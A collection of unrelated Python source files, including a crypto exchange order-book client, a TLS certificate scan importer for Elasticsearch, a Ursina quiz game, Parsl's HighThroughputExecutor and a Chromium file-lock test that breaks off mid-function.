if existing_order['Rate'] == order['Rate']:
del self.socket_order_books[pair_name][side[0]][i]
made_change = True
break
# TYPE 2: Changed order entries at matching price (partial fills, cancellations)
# -> EDIT the order book
elif order['Type'] == 2:
for existing_order in self.socket_order_books[pair_name][side[0]]:
if existing_order['Rate'] == order['Rate']:
existing_order['Quantity'] = order['Quantity']
made_change = True
break
if made_change:
# Sort by price, with respect to BUY(desc) or SELL(asc)
self.socket_order_books[pair_name][side[0]] = sorted(
self.socket_order_books[pair_name][side[0]],
key=lambda k: k['Rate'],
reverse=side[1])
# Put depth to 10
self.socket_order_books[pair_name][side[0]] = \
self.socket_order_books[pair_name][side[0]][
0:self.book_depth]
# Add nounce unix timestamp
self.socket_order_books[pair_name]['NounceStamp'] = time()
elif nounce_diff <= 0:
return
else:
raise NotImplementedError("Implement nounce resync!")
# Debug information, shows all data
def on_debug(self, **kwargs):
# Orderbook snapshot:
if 'R' in kwargs and type(kwargs['R']) is not bool:
self.orderbook_events.put(kwargs['R'])
def on_message(self, *args, **kwargs):
self.tick_queue.put(args[0])
if __name__ == "__main__":
tickers = ['BTC-ETH', 'ETH-1ST', 'BTC-1ST', 'BTC-NEO', 'ETH-NEO']
order_book = OrderBook(tickers, conn_type='cloudflare')
order_book.run()
# Do some sample work
# Wait until the order book snapshots are identified and confirmed
while len(order_book.socket_order_books) < len(order_book.tickers):
sleep(5)
else:
for ticker in order_book.socket_order_books.values():
name = ticker['MarketName']
quantity = str(ticker['Buys'][0]['Quantity'])
price = str(ticker['Buys'][0]['Rate'])
print('Ticker: ' + name + ', Bids depth 0: ' + quantity + '@' + price)
order_book.stop()
|
umich_daily.py
|
import argparse
import sys
from multiprocessing import cpu_count, Process, Queue
import json
import logging
from datetime import datetime
from elasticsearch import Elasticsearch
from elasticsearch.helpers import bulk, scan
import hashlib
from helpers.certparser import process_cert
from helpers.hostparser import proccess_host
logger = logging.getLogger('SSLImporter')
logger_format = logging.Formatter('\033[1;32m%(levelname)-5s %(module)s:%(funcName)s():%(lineno)d %(asctime)s\033[0m| '
'%(message)s')
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setFormatter(logger_format)
logger.addHandler(stream_handler)
elastic_logger = logging.getLogger('elasticsearch')
elastic_logger.addHandler(stream_handler)
DEFAULT_SERVER = u'localhost'
DEFAULT_PORT = 9200
def process_scan_certs(q, es):
"""
:param q: The Queue object that certs should be pulled off of
:param es: An Elasticsearch connection. This way each worker has its own connection and you don't have to share it
across multiple workers/processes
:return:
"""
bulk_certs = []
while True:
certs = q.get()
if certs == "DONE":
bulk(es, bulk_certs)
return True
for cert in certs['certs']:
newcert = process_cert(cert)
if newcert:
newcert['import_date'] = certs['time']
newcert['source'] = 'umich'
newcert_action = {"_index": "passive-ssl-certs-umich", "_type": "cert", '_id': newcert['hash_id'],
'_source': newcert}
bulk_certs.append(newcert_action)
if len(bulk_certs) == 500:
bulk(es, bulk_certs)
bulk_certs = []
def process_hosts(q, es, initial):
"""
:param q: The Queue object that hosts should be pulled off of
:param es: An Elasticsearch connection. This way each worker has its own connection and you don't have to share it
across multiple workers/processes
:param initial: If this is the initial upload then we set the first_seen = last_seen. Other wise first_seen is left
blank and will be cleaned up later
:return:
"""
bulk_hosts = []
while True:
line = q.get()
if line == "DONE":
bulk(es, bulk_hosts)
return True
host = proccess_host(line)
cert_hash = hashlib.sha1(host['host']+host['hash']+host['source'])
cert_hash = cert_hash.hexdigest()
if initial:
host['first_seen'] = host['last_seen']
action = {"_op_type": "update", "_index": 'passive-ssl-hosts-umich', "_type": "host", "_id": cert_hash,
"doc": line, "doc_as_upsert": "true"}
bulk_hosts.append(action)
if len(bulk_hosts) == 500:
bulk(es, bulk_hosts)
bulk_hosts = []
def parse_scanfile(f, host_queue, cert_queue):
"""
:param f: json file from University of Michigan that has been lz4 decompressed.
:param host_queue: Queue to send host info to
:param cert_queue: Queue to send cert info to
:return:
"""
certs_set = set()
with open(f) as scan_file:
for line in scan_file:
item = json.loads(line)
item['log'].pop(0)
for entry in item['log']:
if entry['data']:
if 'server_certificates' in entry['data'] and entry['data']['server_certificates'] is not None:
if entry['data']['server_certificates']['certificate'] is not None:
if 'fingerprint_sha1' in entry['data']['server_certificates']['certificate']:
server_cert = entry['data']['server_certificates']['certificate']['fingerprint_sha1']
doc = {'host': item['host'], 'source': 'umich', 'last_seen': item['time'],
'hash': server_cert}
host_queue.put(doc)
if server_cert in certs_set:
pass # We already have this sha1 and we don't need to attempt parsing it
else:
if entry['data']['server_certificates']['certificate'] is not None:
if 'raw' in entry['data']['server_certificates']:
raw_cert = dict()
raw_cert['time'] = item['time']
raw_cert['certs'] = entry['data']['server_certificates']['raw']
else:
raw_cert = None
if raw_cert:
cert_queue.put(raw_cert)
certs_set.add(server_cert) # We have added this hash to be processed so we
# don't need to process it again
print "Finished processing file....now printing the length of the certs set"
print len(certs_set)
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--server', default=DEFAULT_SERVER,
help=u'Elasticsearch hostname or IP (default {0})'.format(DEFAULT_SERVER))
parser.add_argument('--port', default=DEFAULT_PORT,
help=u'Elasticsearch port (default {0})'.format(DEFAULT_PORT))
parser.add_argument('--scanfile', help=u'Path to umich scan file you are ingesting. '
u'Please make sure to decompress it')
parser.add_argument('--initial', help=u'If this is the first file you are importing please use this flag',
action='store_true')
args = parser.parse_args(argv[1:])
if args.scanfile is None:
logger.error("Please include a scanfile")
sys.exit(1)
workers = cpu_count()
process_hosts_queue = Queue(maxsize=20000)
process_certs_queue = Queue(maxsize=20000)
for w in xrange(workers/2):
# Establish elasticsearch connection for each process
es = Elasticsearch([{u'host': args.server, u'port': args.port}], timeout=30)
p = Process(target=process_hosts, args=(process_hosts_queue, es, args.initial))
p.daemon = True
p.start()
for w in xrange(workers/2):
# Establish elasticsearch connection for each process
es = Elasticsearch([{u'host': args.server, u'port': args.port}], timeout=30)
p = Process(target=process_scan_certs, args=(process_certs_queue, es))
p.daemon = True
p.start()
logger.warning("Starting processing of {file} at {date}".format(file=args.scanfile, date=datetime.now()))
# This is the bottle neck of the process but it works for now
parse_scanfile(args.scanfile, process_hosts_queue, process_certs_queue)
# Once all the json lines have been put onto the queue. Add DONE so the queue workers know when to quit.
for w in xrange(workers):
process_hosts_queue.put("DONE")
process_certs_queue.put("DONE")
# Close out the queue we are done
process_hosts_queue.close()
process_hosts_queue.join_thread()
process_certs_queue.close()
process_certs_queue.join_thread()
# this is kinda dirty but without looking up everything at insert time (slow) I don't know of a better way to do
# this based on the number of documents we will have
refresh_es = Elasticsearch([{u'host': args.server, u'port': args.port}], timeout=30)
# construct an elasticsearch query where the filter is looking for any entry that is missing the field first_seen
q = {'size': 500, "query": {"match_all": {}}, "filter": {"missing": {"field": "first_seen"}}}
new_updates = refresh_es.search(index='passive-ssl-hosts-umich', body=q)
logger.warning("Numer of hosts to update is {count}".format(count=new_updates['hits']['total']))
# Scan across all the documents missing the first_seen field and bulk update them
missing_first_seen = scan(refresh_es, query=q, scroll='30m', index='passive-ssl-hosts-umich')
bulk_miss = []
for miss in missing_first_seen:
last_seen = miss['_source']['last_seen']
first_seen = last_seen
action = {"_op_type": "update", "_index": "passive-ssl-hosts-umich", "_type": "host", "_id": miss['_id'],
"doc": {'first_seen': first_seen}}
bulk_miss.append(action)
if len(bulk_miss) == 500:
bulk(refresh_es, bulk_miss)
bulk_miss = []
# Get the remaining ones that are less than 000 and the loop has ended
bulk(refresh_es, bulk_miss)
logger.warning("{file} import finished at {date}".format(file=args.scanfile, date=datetime.now()))
# Now we should optimize each index to max num segments of 1 to help with searching/sizing and just over all
# es happiness
logger.warning("Optimizing index: {index} at {date}".format(index='passive-ssl-hosts-umich', date=datetime.now()))
refresh_es.indices.optimize(index='passive-ssl-hosts-umich', max_num_segments=1, request_timeout=7500)
logger.warning("Optimizing index: {index} at {date}".format(index='passive-ssl-certs-umich', date=datetime.now()))
refresh_es.indices.optimize(index='passive-ssl-certs-umich', max_num_segments=1, request_timeout=7500)
if __name__ == "__main__":
main(sys.argv)
|
castle.py
|
from ursina import *
from .questionbtn import QuestionBtn, padding
from .question import Question
from .stone import Stone
from .brick import Brick
from .floor import Floor
from .door import Door
from .congrats import Congrats
from .initbtn import InitButton
from ..config import Z_LIMITS
from ..config import X_LIMITS
from ..config import LEVELS_SIZE
from ..config import CASTLE_WIDTH
from ..textures import textures
import threading
import time
import random
well_done_sound = Audio('assets/sounds/Well_Done_1.mp3', loop=False, autoplay=False)
class Castle():
WIDTH = CASTLE_WIDTH
DEPTH = 4
current_player_level = 0
def __init__(self,levels = [1,2,3,4,5,6]):
self.levels = levels
self.HEIGHT = len(levels) * LEVELS_SIZE +1
for z in range(self.DEPTH * -1,self.DEPTH +1 ):
for x in range(self.WIDTH * -1 ,self.WIDTH + 1):
for y in range(1,self.HEIGHT + self.HEIGHT*2):
is_delimited_region = (abs(z) == self.DEPTH or abs(x) == self.WIDTH)
is_the_door = (y<= 3 and x>=0 and x<=1 and z == self.DEPTH * -1)
if is_delimited_region and not is_the_door:
if y > LEVELS_SIZE and ((y+1) % (LEVELS_SIZE/2) == 0 ) :
Entity(model = "quad", texture=textures["window"], position = (x,y-.2,z))
else:
stone = Stone(position=(x,y,z))
if x==1 and y==1 and z==self.DEPTH * -1:
door = Door(position=(.5,y,z),size = 2)
if y% LEVELS_SIZE == 0:
stone = Stone(position=(x,y,z))
l = 1
for level in levels:
self.generate_level(level,l)
l+=1
self.generate_entrance()
self.generate_start_game()
self.generate_congrats()
def upgrade_level(self,delay=1.7):
from .. import player
self.current_player_level +=1
def move_player(delay):
time.sleep(delay)
player.set_position([0,player.y+LEVELS_SIZE,0])
thread = threading.Thread(target=move_player,args=(delay,))
thread.start()
def generate_congrats(self):
c = Congrats(len(self.levels))
def generate_level(self,level,l):
a = 1
delta = (LEVELS_SIZE -1) / len(level["answers"])
delta_y = l * LEVELS_SIZE # - delta
if level["question"]["type"] == "Image":
question = Question(img=level["question"]["value"], position=Vec3(
(CASTLE_WIDTH)-7, (LEVELS_SIZE)*l+(LEVELS_SIZE/2), self.DEPTH-.6))
else:
question = Question(text=level["question"]["value"], position=Vec3(
(CASTLE_WIDTH)-7, (LEVELS_SIZE)*l+(LEVELS_SIZE/2), self.DEPTH-.6))
randomized_answers = level["answers"].copy()
random.shuffle(randomized_answers)
for answer in randomized_answers:
if answer["type"] == "Image":
qb = QuestionBtn(
lambda x: self.upgrade_level() if x else None,
img=answer["value"],
position=Vec3((CASTLE_WIDTH-1) / 2, (LEVELS_SIZE-1) + delta_y, self.DEPTH-.6), is_answer=answer.get("answer", False))
#position = Vec3(0,5,0),is_answer=True)
else:
print(answer)
qb = QuestionBtn(
lambda x: self.upgrade_level() if x else None,
text=answer["value"],
position=Vec3((CASTLE_WIDTH-1) / 2, (LEVELS_SIZE-1) + delta_y, self.DEPTH-.6), is_answer=answer.get("answer", False))
#position = Vec3(0,5,0),is_answer=True)
delta_y = delta_y - delta
a+=1
def generate_start_game(self):
btn = InitButton(self.upgrade_level)
def generate_entrance(self):
for z in range(Z_LIMITS[0],Z_LIMITS[1]+1):
for x in range(X_LIMITS[0],X_LIMITS[1]+1):
# if its infront of the castle
# andits in the center of the castle
if z < self.DEPTH * -1 and z > Z_LIMITS[0]*.8 \
and x>=X_LIMITS[0]*.05 and x<=X_LIMITS[1]*.05:
pass
#destroy(voxel)
voxel = Floor(position=(x,0,z))
|
executor.py
|
from concurrent.futures import Future
import typeguard
import logging
import threading
import queue
import pickle
from multiprocessing import Process, Queue
from typing import Dict, List, Optional, Tuple, Union
import math
from ipyparallel.serialize import pack_apply_message # ,unpack_apply_message
from ipyparallel.serialize import deserialize_object # ,serialize_object
from parsl.app.errors import RemoteExceptionWrapper
from parsl.executors.high_throughput import zmq_pipes
from parsl.executors.high_throughput import interchange
from parsl.executors.errors import BadMessage, ScalingFailed, DeserializationError
from parsl.executors.base import ParslExecutor
from parsl.providers.provider_base import ExecutionProvider
from parsl.data_provider.staging import Staging
from parsl.addresses import get_all_addresses
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
BUFFER_THRESHOLD = 1024 * 1024
ITEM_THRESHOLD = 1024
class HighThroughputExecutor(ParslExecutor, RepresentationMixin):
"""Executor designed for cluster-scale
The HighThroughputExecutor system has the following components:
1. The HighThroughputExecutor instance which is run as part of the Parsl script.
2. The Interchange which is acts as a load-balancing proxy between workers and Parsl
3. The multiprocessing based worker pool which coordinates task execution over several
cores on a node.
4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool
Here is a diagram
.. code:: python
| Data | Executor | Interchange | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|->outgoing_q---|-> process_worker_pool
| | | | batching | | |
Parsl<---Fut-| | | load-balancing| result exception
^ | | | watchdogs | | |
| | | Q_mngmnt | | V V
| | | Thread<--|-incoming_q<---|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
Each of the workers in each process_worker_pool has access to its local rank through
an environmental variable, ``PARSL_WORKER_RANK``. The local rank is unique for each process
and is an integer in the range from 0 to the number of workers per in the pool minus 1.
The workers also have access to the ID of the worker pool as ``PARSL_WORKER_POOL_ID``
and the size of the worker pool as ``PARSL_WORKER_COUNT``.
Parameters
----------
provider : :class:`~parsl.providers.provider_base.ExecutionProvider`
Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`,
:class:`~parsl.providers.cobalt.cobalt.Cobalt`,
:class:`~parsl.providers.condor.condor.Condor`,
:class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`,
:class:`~parsl.providers.gridEngine.gridEngine.GridEngine`,
:class:`~parsl.providers.jetstream.jetstream.Jetstream`,
:class:`~parsl.providers.local.local.Local`,
:class:`~parsl.providers.sge.sge.GridEngine`,
:class:`~parsl.providers.slurm.slurm.Slurm`, or
:class:`~parsl.providers.torque.torque.Torque`.
label : str
Label for this executor instance.
launch_cmd : str
Command line string to launch the process_worker_pool from the provider. The command line string
will be formatted with appropriate values for the following values (debug, task_url, result_url,
cores_per_worker, nodes_per_block, heartbeat_period ,heartbeat_threshold, logdir). For example:
launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}"
address : string
An address to connect to the main Parsl process which is reachable from the network in which
workers will be running. This can be either a hostname as returned by `hostname` or an
IP address. Most login nodes on clusters have several network interfaces available, only
some of which can be reached from the compute nodes.
By default, the executor will attempt to enumerate and connect through all possible addresses.
Setting an address here overrides the default behavior.
default=None
worker_ports : (int, int)
Specify the ports to be used by workers to connect to Parsl. If this option is specified,
worker_port_range will not be honored.
worker_port_range : (int, int)
Worker ports will be chosen between the two integers provided.
interchange_port_range : (int, int)
Port range used by Parsl to communicate with the Interchange.
working_dir : str
Working dir to be used by the executor.
worker_debug : Bool
Enables worker debug logging.
managed : Bool
If this executor is managed by the DFK or externally handled.
cores_per_worker : float
cores to be assigned to each worker. Oversubscription is possible
by setting cores_per_worker < 1.0. Default=1
mem_per_worker : float
GB of memory required per worker. If this option is specified, the node manager
will check the available memory at startup and limit the number of workers such that
the there's sufficient memory for each worker. Default: None
max_workers : int
Caps the number of workers launched by the manager. Default: infinity
prefetch_capacity : int
Number of tasks that could be prefetched over available worker capacity.
When there are a few tasks (<100) or when tasks are long running, this option should
be set to 0 for better load balancing. Default is 0.
suppress_failure : Bool
If set, the interchange will suppress failures rather than terminate early. Default: True
heartbeat_threshold : int
Seconds since the last message from the counterpart in the communication pair:
(interchange, manager) after which the counterpart is assumed to be un-available. Default: 120s
heartbeat_period : int
Number of seconds after which a heartbeat message indicating liveness is sent to the
counterpart (interchange, manager). Default: 30s
poll_period : int
Timeout period to be used by the executor components in milliseconds. Increasing poll_periods
trades performance for cpu efficiency. Default: 10ms
worker_logdir_root : string
In case of a remote file system, specify the path to where logs will be kept.
"""
@typeguard.typechecked
def __init__(self,
label: str = 'HighThroughputExecutor',
provider: ExecutionProvider = LocalProvider(),
launch_cmd: Optional[str] = None,
address: Optional[str] = None,
worker_ports: Optional[Tuple[int, int]] = None,
worker_port_range: Optional[Tuple[int, int]] = (54000, 55000),
interchange_port_range: Optional[Tuple[int, int]] = (55000, 56000),
storage_access: Optional[List[Staging]] = None,
working_dir: Optional[str] = None,
worker_debug: bool = False,
cores_per_worker: float = 1.0,
mem_per_worker: Optional[float] = None,
max_workers: Union[int, float] = float('inf'),
prefetch_capacity: int = 0,
heartbeat_threshold: int = 120,
heartbeat_period: int = 30,
poll_period: int = 10,
suppress_failure: bool = True,
managed: bool = True,
worker_logdir_root: Optional[str] = None):
logger.debug("Initializing HighThroughputExecutor")
self.label = label
self.launch_cmd = launch_cmd
self.provider = provider
self.worker_debug = worker_debug
self.storage_access = storage_access
self.working_dir = working_dir
self.managed = managed
self.blocks = {} # type: Dict[str, str]
self.tasks = {} # type: Dict[str, Future]
self.cores_per_worker = cores_per_worker
self.mem_per_worker = mem_per_worker
self.max_workers = max_workers
self.prefetch_capacity = prefetch_capacity
self.address = address
if self.address:
self.all_addresses = address
else:
self.all_addresses = ','.join(get_all_addresses())
mem_slots = max_workers
cpu_slots = max_workers
if hasattr(self.provider, 'mem_per_node') and \
self.provider.mem_per_node is not None and \
mem_per_worker is not None and \
mem_per_worker > 0:
mem_slots = math.floor(self.provider.mem_per_node / mem_per_worker)
if hasattr(self.provider, 'cores_per_node') and \
self.provider.cores_per_node is not None:
cpu_slots = math.floor(self.provider.cores_per_node / cores_per_worker)
self.workers_per_node = min(max_workers, mem_slots, cpu_slots)
if self.workers_per_node == float('inf'):
self.workers_per_node = 1 # our best guess-- we do not have any provider hints
self._task_counter = 0
self.hub_address = None # set to the correct hub address in dfk
self.hub_port = None # set to the correct hub port in dfk
self.worker_ports = worker_ports
self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.heartbeat_threshold = heartbeat_threshold
self.heartbeat_period = heartbeat_period
self.poll_period = poll_period
self.suppress_failure = suppress_failure
self.run_dir = '.'
self.worker_logdir_root = worker_logdir_root
if not launch_cmd:
self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} "
"-a {addresses} "
"-p {prefetch_capacity} "
"-c {cores_per_worker} "
"-m {mem_per_worker} "
"--poll {poll_period} "
"--task_port={task_port} "
"--result_port={result_port} "
"--logdir={logdir} "
"--block_id={{block_id}} "
"--hb_period={heartbeat_period} "
"--hb_threshold={heartbeat_threshold} ")
def initialize_scaling(self):
""" Compose the launch command and call the scale_out
This should be implemented in the child classes to take care of
executor specific oddities.
"""
debug_opts = "--debug" if self.worker_debug else ""
max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers)
worker_logdir = "{}/{}".format(self.run_dir, self.label)
if self.worker_logdir_root is not None:
worker_logdir = "{}/{}".format(self.worker_logdir_root, self.label)
l_cmd = self.launch_cmd.format(debug=debug_opts,
prefetch_capacity=self.prefetch_capacity,
addresses=self.all_addresses,
task_port=self.worker_task_port,
result_port=self.worker_result_port,
cores_per_worker=self.cores_per_worker,
mem_per_worker=self.mem_per_worker,
max_workers=max_workers,
nodes_per_block=self.provider.nodes_per_block,
heartbeat_period=self.heartbeat_period,
heartbeat_threshold=self.heartbeat_threshold,
poll_period=self.poll_period,
logdir=worker_logdir)
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = True
logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider)
if hasattr(self.provider, 'init_blocks'):
try:
self.scale_out(blocks=self.provider.init_blocks)
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range)
self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._executor_bad_state = threading.Event()
self._executor_exception = None
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}".format(self._queue_management_thread))
self.initialize_scaling()
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
logger.debug("[MTHREAD] queue management worker starting")
while not self._executor_bad_state.is_set():
try:
msgs = self.incoming_q.get(timeout=1)
# logger.debug("[MTHREAD] get has returned {}".format(len(msgs)))
except queue.Empty:
logger.debug("[MTHREAD] queue empty")
# Timed out.
pass
except IOError as e:
logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.exception("[MTHREAD] Caught unknown exception: {}".format(e))
return
else:
if msgs is None:
logger.debug("[MTHREAD] Got None, exiting")
return
else:
for serialized_msg in msgs:
try:
msg = pickle.loads(serialized_msg)
tid = msg['task_id']
except pickle.UnpicklingError:
raise BadMessage("Message received could not be unpickled")
except Exception:
raise BadMessage("Message received does not contain 'task_id' field")
if tid == -1 and 'exception' in msg:
logger.warning("Executor shutting down due to exception from interchange")
self._executor_exception, _ = deserialize_object(msg['exception'])
logger.exception("Exception: {}".format(self._executor_exception))
# Set bad state to prevent new tasks from being submitted
self._executor_bad_state.set()
# We set all current tasks to this exception to make sure that
# this is raised in the main context.
for task in self.tasks:
self.tasks[task].set_exception(self._executor_exception)
break
task_fut = self.tasks[tid]
if 'result' in msg:
result, _ = deserialize_object(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
try:
s, _ = deserialize_object(msg['exception'])
# s should be a RemoteExceptionWrapper... so we can reraise it
if isinstance(s, RemoteExceptionWrapper):
try:
s.reraise()
except Exception as e:
task_fut.set_exception(e)
elif isinstance(s, Exception):
task_fut.set_exception(s)
else:
raise ValueError("Unknown exception-like type received: {}".format(type(s)))
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
raise BadMessage("Message received is neither result or exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
# When the executor gets lost, the weakref callback will wake up
# the queue management thread.
def weakref_cb(self, q=None):
"""We do not use this yet."""
q.put(None)
def _start_local_queue_process(self):
""" Starts the interchange process locally
Starts the interchange process locally and uses an internal command queue to
get the worker task and result ports that the interchange has bound to.
"""
comm_q = Queue(maxsize=10)
self.queue_proc = Process(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port,
self.command_client.port),
"worker_ports": self.worker_ports,
"worker_port_range": self.worker_port_range,
"hub_address": self.hub_address,
"hub_port": self.hub_port,
"logdir": "{}/{}".format(self.run_dir, self.label),
"suppress_failure": self.suppress_failure,
"heartbeat_threshold": self.heartbeat_threshold,
"poll_period": self.poll_period,
"logging_level": logging.DEBUG if self.worker_debug else logging.INFO
},
daemon=True,
name="HTEX-Interchange"
)
self.queue_proc.start()
try:
(self.worker_task_port, self.worker_result_port) = comm_q.get(block=True, timeout=120)
except queue.Empty:
logger.error("Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker, name="HTEX-Queue-Management-Thread")
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def hold_worker(self, worker_id):
"""Puts a worker on hold, preventing scheduling of additional tasks to it.
This is called "hold" mostly because this only stops scheduling of tasks,
and does not actually kill the worker.
Parameters
----------
worker_id : str
Worker id to be put on hold
"""
c = self.command_client.run("HOLD_WORKER;{}".format(worker_id))
logger.debug("Sent hold request to worker: {}".format(worker_id))
return c
@property
def outstanding(self):
outstanding_c = self.command_client.run("OUTSTANDING_C")
# logger.debug("Got outstanding count: {}".format(outstanding_c))
return outstanding_c
@property
def connected_workers(self):
workers = self.command_client.run("WORKERS")
return workers
@property
def connected_managers(self):
workers = self.command_client.run("MANAGERS")
return workers
def _hold_block(self, block_id):
""" Sends hold command to all managers which are in a specific block
Parameters
----------
block_id : str
Block identifier of the block to be put on hold
"""
managers = self.connected_managers
for manager in managers:
if manager['block_id'] == block_id:
logger.debug("[HOLD_BLOCK]: Sending hold to manager: {}".format(manager['manager']))
self.hold_worker(manager['manager'])
def submit(self, func, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- *args (list) : List of arbitrary positional arguments.
Kwargs:
- **kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
if self._executor_bad_state.is_set():
raise self._executor_exception
self._task_counter += 1
task_id = self._task_counter
# handle people sending blobs gracefully
args_to_print = args
if logger.getEffectiveLevel() >= logging.DEBUG:
args_to_print = tuple([arg if len(repr(arg)) < 100 else (repr(arg)[:100] + '...') for arg in args])
logger.debug("Pushing function {} to queue with args {}".format(func, args_to_print))
self.tasks[task_id] = Future()
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024,
item_threshold=1024)
msg = {"task_id": task_id,
"buffer": fn_buf}
# Post task to the the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return self.tasks[task_id]
@property
def scaling_enabled(self):
return self._scaling_enabled
def scale_out(self, blocks=1):
"""Scales out the number of blocks by "blocks"
Raises:
NotImplementedError
"""
r = []
for i in range(blocks):
external_block_id = str(len(self.blocks))
launch_cmd = self.launch_cmd.format(block_id=external_block_id)
internal_block = self.provider.submit(launch_cmd, 1)
logger.debug("Launched block {}->{}".format(external_block_id, internal_block))
if not internal_block:
raise(ScalingFailed(self.provider.label,
"Attempts to provision nodes via provider has failed"))
r.extend([external_block_id])
self.blocks[external_block_id] = internal_block
return r
def scale_in(self, blocks=None, block_ids=[]):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Parameters
----------
blocks : int
Number of blocks to terminate and scale_in by
block_ids : list
List of specific block ids to terminate. Optional
Raises:
NotImplementedError
"""
if block_ids:
block_ids_to_kill = block_ids
else:
block_ids_to_kill = list(self.blocks.keys())[:blocks]
# Hold the block
for block_id in block_ids_to_kill:
self._hold_block(block_id)
# Now kill via provider
to_kill = [self.blocks.pop(bid) for bid in block_ids_to_kill]
r = self.provider.cancel(to_kill)
return r
def status(self):
"""Return status of all blocks."""
status = self.provider.status(list(self.blocks.values()))
return status
def shutdown(self, hub=True, targets='all', block=False):
"""Shutdown the executor, including all workers and controllers.
This is not implemented.
Kwargs:
- hub (Bool): Whether the hub should be shutdown, Default: True,
- targets (list of ints| 'all'): List of block id's to kill, Default: 'all'
- block (Bool): To block for confirmations or not
Raises:
NotImplementedError
"""
logger.info("Attempting HighThroughputExecutor shutdown")
# self.outgoing_q.close()
# self.incoming_q.close()
self.queue_proc.terminate()
logger.info("Finished HighThroughputExecutor shutdown attempt")
return True
|
lock_unittest.py
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import os
import tempfile
import time
import unittest
from py_utils import lock
from six.moves import range # pylint: disable=redefined-builtin
def _AppendTextToFile(file_name):
with open(file_name, 'a') as f:
lock.AcquireFileLock(f, lock.LOCK_EX)
# Sleep 100 ms to increase the chance of another process trying to acquire
# the lock of file as the same time.
time.sleep(0.1)
f.write('Start')
for _ in range(10000):
f.write('*')
f.write('End')
def _ReadFileWithSharedLockBlockingThenWrite(read_file, write_file):
with open(read_file, 'r') as f:
lock.AcquireFileLock(f, lock.LOCK_SH)
content = f.read()
with open(write_file, 'a') as f2:
lock.AcquireFileLock(f2, lock.LOCK_EX)
f2.write(content)
def _ReadFileWithExclusiveLockNonBlocking(target_file, status_file):
with open(target_file, 'r') as f:
try:
lock.AcquireFileLock(f, lock.LOCK_EX | lock.LOCK_NB)
with open(status_file, 'w') as f2:
f2.write('LockException was not raised')
except lock.LockException:
with open(status_file, 'w') as f2:
f2.write('LockException raised')
class FileLockTest(unittest.TestCase):
def setUp(self):
tf = tempfile.NamedTemporaryFile(delete=False)
tf.close()
self.temp_file_path = tf.name
def tearDown(self):
os.remove(self.temp_file_path)
def testExclusiveLock(self):
processess = []
for _ in range(10):
p = multiprocessing.Process(
target=_AppendTextToFile, args=(self.temp_file_path,))
p.start()
processess.append(p)
for p in processess:
p.join()
# If the file lock works as expected, there should be 10 atomic writes of
# 'Start***...***End' to the file in some order, which lead to the final
# file content as below.
expected_file_content = ''.join((['Start'] + ['*']*10000 + ['End']) * 10)
with open(self.temp_file_path, 'r') as f:
# Use assertTrue instead of assertEquals since the strings are big, hence
# assertEquals's assertion failure will contain huge strings.
self.assertTrue(expected_file_content == f.read())
def testSharedLock(self):
tf = tempfile.NamedTemporaryFile(delete=False)
tf.close()
temp_write_file = tf.name
try:
with open(self.temp_file_path, 'w') as f:
f.write('0123456789')
with open(self.temp_file_path, 'r') as f:
